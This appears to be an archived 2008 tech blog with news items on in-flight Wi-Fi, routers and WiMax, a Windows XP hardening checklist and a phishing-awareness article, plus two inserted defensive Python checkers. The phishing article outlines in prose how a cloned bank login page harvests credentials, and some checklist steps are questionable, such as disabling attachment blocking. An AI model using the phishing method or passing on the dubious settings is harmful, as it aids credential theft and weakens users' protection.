Monday, November 24, 2008

Virgin's In-flight Wi-Fi Coming Monday

Virgin America's in-flight Wi-Fi service will launch on Monday for a beta test that is intended to last just one week before a planned commercial launch Dec. 1.

The fledgling domestic airline is making one of the most aggressive moves into in-flight broadband, though most U.S. carriers have announced at least trials or other tests. Virgin plans to have the system from Aircell deployed on all its planes by the middle of next year. On Saturday, it will unveil the service with a flourish, streaming part of the YouTube Live online video event from a plane flying over the San Francisco Bay Area. That plane will go on to serve as the beta test plane, and all passengers who take it will get free Wi-Fi during the test period.

Interest in Wi-Fi on commercial airliners is growing despite the closure of the highest-profile in-flight system, Connexion by Boeing, in 2006. The services, which in general won't allow VoIP (voice over Internet protocol) calls, could be a critical revenue source for ailing airlines as well as a convenience for passengers.

Virgin will charge US$9.95 for a flight of three hours or less and $12.95 for longer flights. Internet access won't be filtered for content or applications, except for the VoIP restriction, said Virgin spokeswoman Abby Lunardini. Aircell has said it has mechanisms to manage the shared bandwidth to prevent one user from taking it all.

Aircell, which is also working with several other carriers, will provide Internet access to planes via its own national network of 3G (third-generation) base stations on the ground. The connection from the plane to the Internet will be via EV-DO (Evolution-Data Optimized) Revision A technology. The base stations are being supplied by ZTE USA, a subsidiary of Chinese telecommunications giant ZTE. Qualcomm, the pioneer of EV-DO, supplied the onboard modems.

Virgin claims it will be the first airline in the U.S. to deploy in-flight broadband on all its planes. It has some advantages in this mission, since it has only 28 planes and all are new. Virgin America itself only started flights in August 2007. Virgin already uses Wi-Fi on its planes for wireless devices that let flight attendants take food and drink orders, Lunardini said. The broadband technology will be added to planes gradually over the following months, she said. There will be multiple aircraft with the Wi-Fi service before the end of December.

Delta Air Lines said in August it would deploy the Aircell system on all the planes in its main fleet by summer 2009, which in the U.S. ends at about the end of August. American Airlines is offering a service on a limited-time trial, as is JetBlue.

The demand is there from passengers, especially business travelers, but whether more airlines commit to permanent commercial services will depend on price and performance, two longtime wireless analysts said on Thursday.

Key unanswered questions include how well the technical controls will work if someone tries to make VoIP calls or hog the Internet connection with movie downloads, and how the airlines will solve passengers' technical issues without an onboard IT staff, said Jack Gold, principal analyst at J. Gold Associates.

"Users are going to have problems. It just happens," Gold said.

Any new source of revenue will be attractive to the cash-strapped airlines, said Gartner analyst Ken Dulaney. The economics of in-flight broadband have improved since the days of Connexion, with lighter on-board systems helping airlines meet tight budgets for weight, he said. But as a discount airline, Virgin may have a harder time than some at selling the service, Dulaney said.

"We've gotten to this point with the airlines because people didn't want to pay for a meal or anything," Dulaney said.

Linksys Launches WAG160N Wireless Router

Linksys has announced the availability of the WAG160N, a Wireless-N ADSL2+ Gateway that integrates the functionalities of an ADSL2+ Modem, Router, 4-port Switch and a Wireless-N Access Point.

According to a press release, the WAG160N is the newest addition to the Wireless-N line-up and it features the same design as sported by the recent Ultra RangePlus family of Wireless-N routers (WRT160N and WRT310N). The new design features an internal antenna technology which integrates the antenna into the device body.

The WAG160N ships with the Linksys EasyLink Advisor (LELA) application, which provides consumers with a flash video-based guided installation for PC and Mac users. The WAG160N is based on draft 802.11n technology and the built-in Wireless-N Access Point enables users to connect wireless devices in the building without using cables. It also supports Multiple Input, Multiple Output (MIMO) technology, which is designed to increase the range and reduce 'dead spots' in the wireless coverage area. In addition, the WAG160N supports up to 256-bit industrial-strength encryption and 802.1x authentication and authorization.

The Linksys WAG160N is available for a price of Rs. 7,925 (US$160).

Why IT Should Get in the Facilities Business

Picture in your mind the facilities management guy or gal in your building: Are you envisioning someone in a pair of overalls and a screwdriver tucked in the back pocket?

If so, who are you going to call when the rack density in the datacenter increases from 2 to 3 kilowatts per rack to 12 kW per rack thanks to IT technologies like virtualization and server consolidation?

If your facilities manager is the screwdriver-in-the-pocket type, don't be surprised when you're told, "You better shut some of these contraptions down!"

Due to the realities of rising energy costs and new energy management systems, the traditional facilities manager is morphing into a tech-savvier operations role, one that is pushing both IT managers and facilities managers into a more consultative relationship. In some cases, facilities management is becoming part of IT.

At a recent Datacenter Users' Group meeting sponsored by Emerson Network Power, 62 percent of the 230 industry experts from Fortune 1000 companies said that collaboration between IT and facilities management has increased over the last 12 months.

Matt Kightlinger, director of solutions at Emerson, believes that driving this convergence is the need for energy efficiency to lead to lower costs. "It is forcing IT and [facilities management] to increase efficiencies from an operations perspective," he says.

But there's been a historic disconnect between IT and facilities, with each making decisions in isolation. "IT buys on performance from IT vendors, so they never get the actual [energy] bill at the end of the month," says David Cappuccio, a Gartner analyst. But the high cost of energy is pushing the two groups together. When the CFO asks IT and facilities about the IT energy budget, each side says the other department is responsible, and that's not an acceptable answer. "Suddenly, both sides are realizing that to create a more efficient infrastructure based on energy, they need to cooperate," he says.

The Shift Starts in the Datacenter

The hot spot for this shift into tech is definitely the datacenter. That is where the business logic for combining IT and facilities management really comes on strong.

Typically, "facilities management" means taking care of the building systems, comfort systems, and power. But facilities management also takes care of the critical energy infrastructure that goes into the datacenter. And that means IT is at least heavily involved with facilities and, in some cases, applies IT techniques itself to managing the energy infrastructure.

The popularity of energy-saving virtualization technology is one reason IT is getting involved in energy infrastructure management. Here's why: The use of virtualization reduces the number of servers needed, decreasing overall energy consumption, but there's now more energy used per server and greater risk to the enterprise if any server fails, since several virtual servers will shut off when the physical server goes.

Suddenly IT finds itself more concerned with increased energy monitoring and cooling at the rack level -- having sufficient juice and cooling in the rack room is not good enough, says Gartner's Cappuccio. That rack-level focus is not an area in which facilities management is experienced.

Server chips from AMD and Intel can trigger automatic alerts when they detect too much heat and even throttle back the chip speed to reduce heat emissions. However, a simple solution like throttling back may not be the answer if those racks are running mission-critical applications during peak business hours. This goes way beyond the room- and building-oriented energy and cooling focus of traditional facilities management, instead requiring systems akin to network management, in which IT has experience.

When the facilities and IT networks are part of a single entity, the unified system will know when peak demand is expected and be able to react better. For example, the policies in such a system could turn on more servers or draw from on-demand resources to better distribute the load, rather than curb performance.

Another area where IT has the experience required for the new energy environment is in asset tracking, says Emerson's Kightlinger. It's not enough to track physical assets, he says; businesses need to also track the power consumption and usage patterns to figure out appropriate load balancing -- the kind of work typically handled through monitoring software IT has long experience with, all managed through a database. "IT managers run that [database]," he says.

But the systems IT has used for monitoring -- such as CA Unicenter, Hewlett-Packard OpenView, and IBM Tivoli -- haven't been designed to understand the implications of energy usage or the business implications of changes, says James White, a product manager at Managed Objects. However, that's beginning to change as "business service management" features -- specifically, ones related to facilities management -- come into the traditional monitoring tools from CA, HP, IBM, and Managed Objects.

The Intertwining of IT and Facilities Outside the Datacenter

The focus of cooperation and even convergence between facilities and IT in the datacenter is driven by ensuring business efficiency and continuity. But outside the datacenter, there's a simpler motivation: cost savings.

Traditionally, HVAC systems are overengineered, so there's redundancy and future capacity built in. That translates to extra ducts and greater cooling or heating capacity than needed -- a reasonable approach because it's been cheaper to allow such waste in return for not requiring major, expensive rework when your demands grew over time. But with ever-increasing energy costs, that approach no longer works well.

Today, IT has the ability to analyze data on energy usage, work patterns, and other facilities domains to reduce the need for such overengineering, thus lowering costs, says Tom Debin, CEO of Equity Through Energy, a building automation supplier. For example, analysis can tell you how many kilowatts are being used per square foot in a building, helping planners decide whether or not to close or renovate the facility.

Or take the case of something as simple as a water heating system in a restaurant. The designer will design for maximum flow on the maximum day with 100 percent use and then put a fudge factor of 25 percent after he gets it printed out and goes to the plumber. The plumber thinks, "I don't want to be called for a repair later, so I will buy the next model up," adding another 25 percent. So by the time it gets to the job site and the customer has a say, you may have a water heater that costs more in both material and energy costs than is justifiable by the actual demand. "Bigger isn't better," says Debin.

The benefits of analysis-based energy management include lower costs for energy, decreased equipment maintenance costs, a reduced carbon footprint, consistency across the real estate portfolio, and increased effectiveness and decreased cost of the extended enterprise, says Dan Sharplin, CEO at Site Controls, a building automation supplier.

"Intelligent" building automation systems that control power usage based on actual consumption and building designs that are less overengineered both bring challenges when deployed, says James Jones, product manager at Infor, an enterprise asset management vendor.

First, managing these systems requires the pervasive use of sensors that are networked together. It is IT that must manage the network and the data it generates. "IT takes responsibility for information systems that get installed at the site," says Jones. "While the guy you want to fix the boiler needs to be a journeyman technician, a lot of times what you are dealing with or alerted about is a condition coming from an information system. So does IT own that?" Whether or not IT owns it, "IT needs to be able to run with it even if someone else installs it," he adds.

Second, IT needs to be able to understand and intelligently act on the data that the building automation systems generate. IT's role doesn't stop at ensuring the system is running as planned, but extends to helping identify new, better ways to reduce waste and increase efficiency. "The key is having the data available to the extended enterprise in an actionable format," says Site Controls' Sharplin.

Update Windows

-> Go to http://windowsupdate.microsoft.com
--> Download ALL updates available
---> Reboot when asked, then log in to the administrator account again
----> Return to this site to download more and more and more patches
-----> Continue to download/install patches, rebooting and returning to this page until you have downloaded ALL patches and cannot download any more patches.
-> Remember to come back to see new patches, hopefully every week but at least once a month! We have set up automatic Windows Update, but I STILL insist that you recheck for ANY new updates every once in a while. Just to be sure. Updating your Windows, Windows Media Player, Internet Explorer, Outlook Express etc. is REALLY THAT IMPORTANT!


Secure file and folder permissions

-> My Computer
--> Right-click C:\
---> Properties
----> General
-----> Disable: Allow indexing service to index this disk for fast file searching
----> Security
-----> Add
------> Type: Authenticated Users
-------> Press enter
-----> Select: Authenticated Users
------> Allow: Read & Execute, List folder content, Read
-----> Advanced
------> Unselect: Inherit from parent the permission entries...
-------> Copy
------> Remove all other users except: Administrator, System and Authenticated Users
-------> Select: Replace permission entries...
--------> OK
---------> Yes

--> Go to C:\documents and settings\
---> Right-click the Administrator folder
----> Properties
-----> Security
------> Advanced
-------> Unselect: Inherit from parent the permission entries...
--------> Copy
---------> Remove: Authenticated Users
----------> Select: Replace permission entries...
-----------> OK
------------> Yes
---> Right-click, one at a time, all other user folders (like "mom", "userX", etc.)
----> Properties
-----> Security
------> Advanced
-------> Unselect: Inherit from parent the permission entries...
--------> Copy
---------> Remove: Authenticated Users
----------> Add the name of the user (like "mom", "userX", etc.) whose folder this is. This will prevent all other users except admins from getting into their folders.
-----------> Allow: Full Control
----------> Select: Replace permission entries...
-----------> OK
------------> Yes
--> Go to C:\windows (or if your Windows is installed onto some other directory, then go there)
---> Select "temp" folder
----> Properties
-----> Security
------> Select: Authenticated Users
-------> Allow: Full Control
--> You can also set permissions like this on other partitions and folders. Please be advised that if you store something like games somewhere, the users who need to play those games usually need full control on those folders so that they can save games etc. The same goes if you store other files on those partitions, like music, documents etc., that other people want to not only access but also save and edit. In that case you should give "Authenticated Users" full permissions on those folders. The main thing is that your personal folders (C:\documents and settings\userX\) are safe from other people's tampering, and so are important system folders (C:\windows\).

-> To encrypt (EFS) the content of directories and prevent all other users (including administrators) from reading the content of files inside (only in XP pro version) the directory (notice: they can still see the file names and alter folder settings)
-> Only use this for YOUR personal directories (like to folders where you keep personal documents etc.), do not use on system, program, etc. directories!
--> Right-click the directory you wish to encrypt
---> Properties
----> General
-----> Advanced
------> Enable: Encrypt contents to secure data (notice: if you are logged in as administrator, this will encrypt the data for the administrator account only. To encrypt data for your USER account, first secure your Windows XP installation, then log in as that user and start encrypting your folders)


Adjust event viewer settings

-> Control Panel
--> Performance and maintenance
---> Administrative tools
----> Event viewer
-----> Right click: Application
------> Properties
-------> Maximum log size: 10048
--------> Select: Overwrite events as needed
-----> Right click: Security
------> Properties
-------> Maximum log size: 10048
--------> Select: Overwrite events as needed
-----> Right click: System
------> Properties
-------> Maximum log size: 10048
--------> Select: Overwrite events as needed

Secure settings

-> Control panel
--> Performance and maintenance
---> Administrative tools
----> Local security policy
-----> Account policies
------> Password policy
------> Enforce password history - 0 passwords remembered
------> Maximum password age - 360 days
------> Minimum password age - 0 days
------> Minimum password length - 14 characters
------> Password must meet complexity requirements - Enabled
------> Store passwords using reversible encryption for all users in the domain - Disabled
-----> Account lockout policy
------> Account lockout threshold - 3 invalid logon attempts.
------> Account lockout duration - 15 minutes
------> Reset account lockout counter after - 15 minutes
-----> Local policies
------> Audit policy
-------> Audit account logon events - Success, failure
-------> Audit account management - Success, failure
-------> Audit logon events - Success, failure
-------> Audit Object access - Success, failure
-------> Audit policy change - Success, failure
-------> Audit system events - Success, failure
------> User rights assignment
-------> Access this computer from the network -
-------> Act as part of the operating system -
-------> Add workstations to domain -
-------> Adjust memory quotas for a process - LOCAL SERVICE,NETWORK SERVICE,Administrators
-------> Allow logon through Terminal Services -
-------> Back up files and directories - Administrators
-------> Bypass traverse checking - Authenticated Users,Administrators
-------> Change the system time - Administrators
-------> Create a pagefile - Administrators
-------> Create a token object -
-------> Create permanent shared objects -
-------> Debug programs - Administrators
-------> Deny access to this computer from the network - Everyone
-------> Deny logon as a batch job -
-------> Deny logon as a service -
-------> Deny logon locally -
-------> Deny logon through Terminal Services - Everyone
-------> Enable computer and user accounts to be trusted for delegation -
-------> Force shutdown from a remote system -
-------> Generate security audits - LOCAL SERVICE,NETWORK SERVICE
-------> Increase scheduling priority - Administrators
-------> Load and unload device drivers - Administrators
-------> Lock pages in memory - LOCAL SERVICE, Authenticated Users,Administrators
-------> Log on as a batch job -
-------> Log on as a service -
-------> Log on locally - Authenticated Users, Administrators
-------> Manage auditing and security log - Administrators
-------> Modify firmware environment values - Administrators
-------> Perform volume maintenance tasks - Administrators
-------> Profile single process -
-------> Profile system performance -
-------> Remove computer from docking station - Authenticated Users,Administrators
-------> Replace a process level token - LOCAL SERVICE
-------> Restore files and directories - Administrators
-------> Shut down the system - Authenticated Users, Administrators
-------> Synchronize directory service data -
-------> Take ownership of files or other objects - Administrators
------> Security options
-------> Accounts: Administrator account status - Enabled
-------> Accounts: Guest account status - Disabled
-------> Accounts: Limit local account use of blank passwords to console logon only - Enabled
-------> Accounts: Rename administrator account - (TYPE SOME NAME HERE AND USE IT WHEN YOU LOGIN AS ADMINISTRATOR IN THE FUTURE)
-------> Accounts: Rename guest account - Guest
-------> Audit: Audit the access of global system objects - Disabled
-------> Audit: Audit the use of Backup and Restore privilege - Disabled
-------> Audit: Shut down system immediately if unable to log security audits - Disabled
-------> Devices: Allow undock without having to log on - Disabled
-------> Devices: Allowed to format and eject removable media - Administrators
-------> Devices: Prevent users from installing printer drivers - Enabled
-------> Devices: Restrict CD-ROM access to locally logged-on user only - Enabled
-------> Devices: Restrict floppy access to locally logged-on user only - Enabled
-------> Devices: Unsigned driver installation behavior - Do not allow installation
-------> Domain controller: Allow server operators to schedule tasks - Disabled
-------> Domain controller: LDAP server signing requirements - Not defined
-------> Domain controller: Refuse machine account password changes - Enabled
-------> Domain member: Digitally encrypt or sign secure channel data (always) - Enabled
-------> Domain member: Digitally encrypt secure channel data (when possible) - Enabled
-------> Domain member: Digitally sign secure channel data (when possible) - Enabled
-------> Domain member: Disable machine account password changes - Enabled
-------> Domain member: Maximum machine account password age - 1
-------> Domain member: Require strong (Windows 2000 or later) session key - Enabled
-------> Interactive logon: Do not display last user name - Enabled
-------> Interactive logon: Do not require CTRL+ALT+DEL - Disabled
-------> Interactive logon: Message text for users attempting to log on -
-------> Interactive logon: Message title for users attempting to log on -
-------> Interactive logon: Number of previous logons to cache (in case domain controller is not available) - 0 logons
-------> Interactive logon: Prompt user to change password before expiration - 14 days
-------> Interactive logon: Require Domain Controller authentication to unlock workstation - Enabled
-------> Interactive logon: Smart card removal behavior - Lock Workstation
-------> Microsoft network client: Digitally sign communications (always) - Enabled
-------> Microsoft network client: Digitally sign communications (if server agrees) - Enabled
-------> Microsoft network client: Send unencrypted password to third-party SMB servers - Disabled
-------> Microsoft network server: Amount of idle time required before suspending session - 1
-------> Microsoft network server: Digitally sign communications (always) - Enabled
-------> Microsoft network server: Digitally sign communications (if client agrees) - Enabled
-------> Microsoft network server: Disconnect clients when logon hours expire - Enabled
-------> Network access: Allow anonymous SID/Name translation - Disabled
-------> Network access: Do not allow anonymous enumeration of SAM accounts - Enabled
-------> Network access: Do not allow anonymous enumeration of SAM accounts and shares - Enabled
-------> Network access: Do not allow storage of credentials or .NET Passports for network authentication - Enabled
-------> Network access: Let Everyone permissions apply to anonymous users - Disabled
-------> Network access: Named Pipes that can be accessed anonymously -
-------> Network access: Remotely accessible registry paths -
-------> Network access: Shares that can be accessed anonymously -
-------> Network access: Sharing and security model for local accounts - Classic local users authenticate as themselves
-------> Network security: Do not store LAN Manager hash value on next password change - Enabled
-------> Network security: Force logoff when logon hours expire - Disabled
-------> Network security: LAN Manager authentication level - Send NTLMv2 response only\refuse LM & NTLM
-------> Network security: LDAP client signing requirements - Require signing
-------> Network security: Minimum session security for NTLM SSP based (including secure RPC) clients - Require message integrity,Require message confidentiality,Require NTLMv2 session security,Require 128-bit encryption
-------> Network security: Minimum session security for NTLM SSP based (including secure RPC) servers - Require message integrity,Require message confidentiality,Require NTLMv2 session security,Require 128-bit encryption
-------> Recovery console: Allow automatic administrative logon - Disabled
-------> Recovery console: Allow floppy copy and access to all drives and all folders - Disabled
-------> Shutdown: Allow system to be shut down without having to log on - Disabled
-------> Shutdown: Clear virtual memory pagefile - Enabled
-------> System cryptography: Use FIPS compliant algorithms for encryption, hashing, and signing - Enabled
-------> System objects: Default owner for objects created by members of the Administrators group - Object creator
-------> System objects: Require case insensitivity for non-Windows subsystems - Enabled
-------> System objects: Strengthen default permissions of internal system objects (e.g. Symbolic Links) - Enabled
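The Local Security Policy values above can also be exported with secedit /export /cfg <file> and checked mechanically. The following script is an added example, not from the original page: it parses that export and reports every value that deviates from the checklist. The section and key names are secedit's own; the sample export embedded at the bottom is constructed, with three deliberate deviations.

```python
"""Check a `secedit /export /cfg <file>` dump against the Local Security Policy
values listed above.  Added example, not from the original page: the section
and key names are secedit's own, the sample export below is constructed."""

# Baseline taken from the checklist: section -> key -> expected value.
# Audit values: 0 none, 1 success, 2 failure, 3 success and failure.
# SIDs: S-1-1-0 Everyone, S-1-5-32-544 Administrators.
BASELINE = {
    "System Access": {
        "PasswordHistorySize": "0", "MaximumPasswordAge": "360",
        "MinimumPasswordAge": "0", "MinimumPasswordLength": "14",
        "PasswordComplexity": "1", "ClearTextPassword": "0",
        "LockoutBadCount": "3", "LockoutDuration": "15",
        "ResetLockoutCount": "15", "EnableAdminAccount": "1",
        "EnableGuestAccount": "0",
    },
    "Event Audit": {
        "AuditAccountLogon": "3", "AuditAccountManage": "3",
        "AuditLogonEvents": "3", "AuditObjectAccess": "3",
        "AuditPolicyChange": "3", "AuditSystemEvents": "3",
    },
    "Privilege Rights": {
        "SeDenyNetworkLogonRight": "*S-1-1-0",
        "SeDebugPrivilege": "*S-1-5-32-544",
        "SeTcbPrivilege": "",  # act as part of the operating system: nobody
    },
    "Registry Values": {
        # 4 = REG_DWORD, 1 = REG_SZ; LM level 5 = NTLMv2 only, refuse LM & NTLM
        r"MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel": "4,5",
        r"MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash": "4,1",
        r"MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM": "4,1",
        r"MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignature": "4,1",
        r"MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount": '1,"0"',
    },
}

def parse_secedit(text):
    """INF-style export -> {section: {key: value}}; keys may contain '\\' and spaces."""
    policy, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            policy.setdefault(section, {})
        elif section is not None and "=" in line:
            key, value = line.split("=", 1)   # only the first '=' separates
            policy[section][key.strip()] = value.strip()
    return policy

def audit(export_text, baseline=BASELINE):
    """Return (section, key, expected, actual) per deviation; missing key -> actual None."""
    current = parse_secedit(export_text)
    findings = []
    for section, keys in baseline.items():
        present = current.get(section, {})
        for key, expected in keys.items():
            actual = present.get(key)
            if actual is None and expected == "":
                continue  # secedit omits rights that are granted to nobody
            if actual != expected:
                findings.append((section, key, expected, actual))
    return findings

# Constructed export with three deliberate deviations: 8-character minimum
# password, Guest account enabled, LM level 2 (plain NTLM still accepted).
SAMPLE_EXPORT = r"""[System Access]
MinimumPasswordAge = 0
MaximumPasswordAge = 360
MinimumPasswordLength = 8
PasswordComplexity = 1
PasswordHistorySize = 0
LockoutBadCount = 3
ResetLockoutCount = 15
LockoutDuration = 15
ClearTextPassword = 0
EnableAdminAccount = 1
EnableGuestAccount = 1
[Event Audit]
AuditSystemEvents = 3
AuditLogonEvents = 3
AuditObjectAccess = 3
AuditPolicyChange = 3
AuditAccountManage = 3
AuditAccountLogon = 3
[Privilege Rights]
SeDenyNetworkLogonRight = *S-1-1-0
SeDebugPrivilege = *S-1-5-32-544
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymousSAM=4,1
MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignature=4,1
MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount=1,"0"
"""
```

On a real machine, read the export with encoding="utf-16" (secedit writes Unicode with a BOM) and pass the text to audit(); an empty list means the listed values match.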

Secure Outlook Express

-> Start Outlook Express
--> Tools
---> Options
----> Read
-----> Enable: Read all messages in plain text
----> Send
-----> Mail sending format
------> Select: Plain text
----> Security
-----> Disable: Do not allow attachments to be saved or opened that could potentially be a virus (if you don't disable this one, your ability to receive attachments is almost zero. Your email virus protection should rely on the fact that you do NOT open files that you receive as email attachments if you are not ABSOLUTELY sure they are safe to be run.)
----> Maintenance
-----> Enable: Purge deleted messages when leaving IMAP folders

WiMax's Troubles With In-building Wireless a Boon to MobileAccess

Even as WiMax promises faster average network speeds than other wireless networks, one company is banking on making money off one of WiMax's downsides -- a difficulty in penetrating the walls of large buildings.

Cathy Zatloukal, CEO of MobileAccess Networks in Vienna, Va., said WiMax wireless transmissions will have just as many, if not more, problems as other cellular signals in passing through walls and specially coated windows in large buildings, such as hospitals, hotels and factories.

That's good for MobileAccess, which has been filtering and amplifying cellular signals since 1998 for thousands of customers who need better indoor wireless connections, Zatloukal said.

In an interview at her booth at WiMax World here this week, Zatloukal said her company has already heard from businesses that would like to use WiMax for outdoor high-speed transmissions between building sites and want to know how they can boost signals indoors. MobileAccess, a partner of Sprint Nextel Corp., has worked with the wireless carrier to connect its amplification and filtering gear to Sprint's cellular base stations inside of buildings.

Inside a building, probably in the basement, MobileAccess would connect a controller box to a WiMax base station, sending data from there over a fiber optic cable to various switches throughout the building. In each switching closet, often located on every floor, the fiber would connect to a MobileAccess hub, where the WiMax signal would be carried over coaxial cable to special antennas in the ceilings.

A prime candidate for WiMax use inside a business is video surveillance to secure parking lots, hallways and rooms. High-quality video surveillance may require 4Mbit/sec. uplink transmission speeds, which WiMax can support, Zatloukal said. But once inside, that wireless signal could be degraded as it passes through concrete walls or the metal coating on windows used to reflect away sunlight in hot climates. With the amplification that MobileAccess provides, the surveillance data over WiMax could make its way to a security command center and could be forwarded to a security guard in another part of the facility, she said.

Machine-to-machine commands over wireless will also be a prime candidate for WiMax, as builders seek ways to control heating and cooling and other systems.

"We see a growing market," Zatloukal said, noting that ABI Research Inc. has estimated that in-building amplification of wireless could be a US$15 billion market in five years. ABI said MobileAccess competes with ADC Telecommunications Inc. in Minneapolis, InnerWireless Inc. in Richardson, Tex., and CommScope Inc., in Hickory, N.C.

How to Avoid Phishing Scams

If you received an E-mail message from your bank saying that your checking account was overdrawn because of a check that you didn’t write, what would you do? Before you answer, it’s important to realize that you may not really be overdrawn and that there is a good chance that someone is trying to scam you. In this article, I will explain exactly how this type of scam works and how to avoid being a victim.

Imagine that tomorrow morning, you get up out of bed and check your E-mail. There is a message from your bank indicating that you are overdrawn on your checking account because a check that you wrote for $2457.83 bounced. You don’t remember writing a check for this amount. What do you do?

Hopefully, you answered that you would call the bank rather than logging onto the bank’s Web site to check out the problem for yourself. The situation that I just described is known as a Phishing (pronounced fishing) scam. Here’s how it works.

The person who is initiating the scam sends an E-mail to millions of people. The E-mail message is designed to appear to come from a bank, Internet Service Provider, online auction company, or from anyone else that you could potentially have regular business dealings with. The From header on the message is spoofed, and the message is designed to look as official as possible. The message’s sole purpose is to gather information.

Let’s go back to my earlier example in which a message allegedly came from your bank indicating that your account is overdrawn because of a check that you didn’t write. The vast majority of the people who receive the message don’t even use the bank that the message claims to be from. In this case though, the message just happens to appear to be from the bank that you use. Because the message appears to be related to a serious matter involving your bank, the person initiating the scam now has your attention.

Typically, such a message will urge you to take action and will provide a link to the bank's Web site and/or the bank's phone number. Although the phone number may or may not actually be the bank's phone number, the Web site URL is never legitimate even if it appears to be legitimate.

Sometimes a person involved in a Phishing scheme will put the bank’s actual phone number in the E-mail in hopes of making the message seem more authentic. Other times though, they will put another number and have someone just waiting for calls from panicked bank customers. This person will typically ask the person who is calling for an account number, a PIN number, and any other information that might be useful, such as a social security number or birth date. The phony bank employee will then pretend to solve the problem while you are on the phone. In actuality though, the problem is just beginning. You weren’t actually overdrawn on your checking account, and now you have given your account information directly to a thief who can use it to clean out your bank account or to launch other identity theft scams.

So what about that official looking URL in the E-mail message? Sure, it probably looks like the bank’s official Web site, but try hovering your mouse over the URL. When you hover your mouse over the URL, you will see the hyperlink appear. If the URL is legitimate, the hyperlink should match the URL displayed in the message EXACTLY. Typically, the person who created the message will replace the URL with an IP address, or they will use a domain name that is spelled very similarly to the bank’s domain name. To show you what I am talking about, have a look at Figure A. Figure A contains a very simple Web page that I have created. This page appears to have a link to mybank.com, but if you look at the bottom of Internet Explorer, you will see that the link is actually being directed to http://147.100.100.100. If such a link had been E-mailed to me, the hyperlink would appear in a small pop-up rather than at the bottom of the window.

Figure A: This Web page appears to be directed to mybank.com, but is actually pointed at some other Web site instead.
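The hover test can be applied automatically. The following Python script is an added example, not code from the article: it pulls every link out of an HTML message and flags those whose visible text names a different host than the href, those that point at a bare IP address, and, when told which domain the message claims to come from, any link outside that domain. The message body is constructed and reuses the Figure A case (text says mybank.com, link goes to 147.100.100.100).

```python
"""Flag anchors in an HTML message whose visible text does not match where they go.

Added example, not from the article. SAMPLE_HTML is a constructed message.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_HTML = """
<p>Your account is overdrawn. Please log in at
<a href="http://147.100.100.100/login">http://www.mybank.com</a> immediately.</p>
<p>Questions? See <a href="https://www.mybank.com/help">www.mybank.com/help</a>
or <a href="http://www.mybank-secure.example/">click here</a>.</p>
"""

# Visible text that itself looks like a URL or host name, e.g. "www.mybank.com/help".
HOSTLIKE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/:?#]|$)", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def check_link(href, text, expected_domain=None):
    """Return a reason string if the link looks deceptive, else None."""
    target = (urlsplit(href).hostname or "").lower()
    if is_ip_literal(target):
        return f"link goes to a bare IP address ({target})"
    m = HOSTLIKE.match(text)
    if m and m.group(1).lower() != target:
        return f"visible text names {m.group(1)} but link goes to {target}"
    if expected_domain:
        d = expected_domain.lower()
        if target != d and not target.endswith("." + d):
            return f"link host {target} is not under {d}"
    return None


def suspicious_links(html, expected_domain=None):
    """(href, text, reason) for every link in html that fails check_link."""
    parser = LinkCollector()
    parser.feed(html)
    return [(href, text, reason) for href, text in parser.links
            if (reason := check_link(href, text, expected_domain))]


if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_HTML, "mybank.com"):
        print(f"{text!r} -> {href}: {reason}")
```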

Obviously, the idea behind a Phishing scam is to panic you into clicking on the link contained in the E-mail message and then getting you to enter your bank account number and password. Therefore, you might be wondering how someone could be tricked into entering their account information into a Web site that does not belong to their bank.

Truthfully, it is very easy to scam someone into entering information into a false Web site. To see how easy it is, try this little experiment. Go to your bank’s Web site and then select the Source command from Internet Explorer’s View menu. This will show you the source code to your bank’s Web site, as shown in Figure B.

Figure B: This is the source code for Bank of America’s Web site.

Actually, you aren’t really looking at the source code. Remember that HTML stands for HyperText Markup Language. The information that you are seeing is simply the HTML instructions used to display the bank’s home page. Financial institutions typically use a server side scripting language such as ASP to control what visitors to the site actually see.

None of that really matters though because the hacker doesn’t need to recreate the bank’s entire Web site. They only need to recreate the first screen, and the bank has provided them with the HTML code to do it!

The person performing the Phishing scam would simply make a few minor modifications to the code and then upload it to their own Web site. Typically, the modifications would involve the login prompts. Remember that the victim of the scam can’t really log into the fake bank Web site, because the person who created the site has no way of validating the bank customer’s credentials. Instead, the person conducting the scam simply re-engineers the bank’s HTML code so that when the customer enters their account number and password, the account number and password are added to a database. What typically happens next is that the victim is redirected to the bank’s real home page. Of course they are not logged in when they get there. The victim assumes that they typed the password incorrectly and enters it again. This time they are logged in, because they are on the bank’s real Web site. The victim has no idea that they have just given their account number and password to a scam artist.

How Not To Be A Victim

So far, I have given you detailed instructions for how to pull off a Phishing scam. I am not however giving you this information so that you can go rip people off. Instead, I am showing you how a Phishing scam works so that you can avoid being ripped off. Of course, understanding how the scam works is only half of the battle. You still need to know how to spot the scam and avoid being victimized by it.

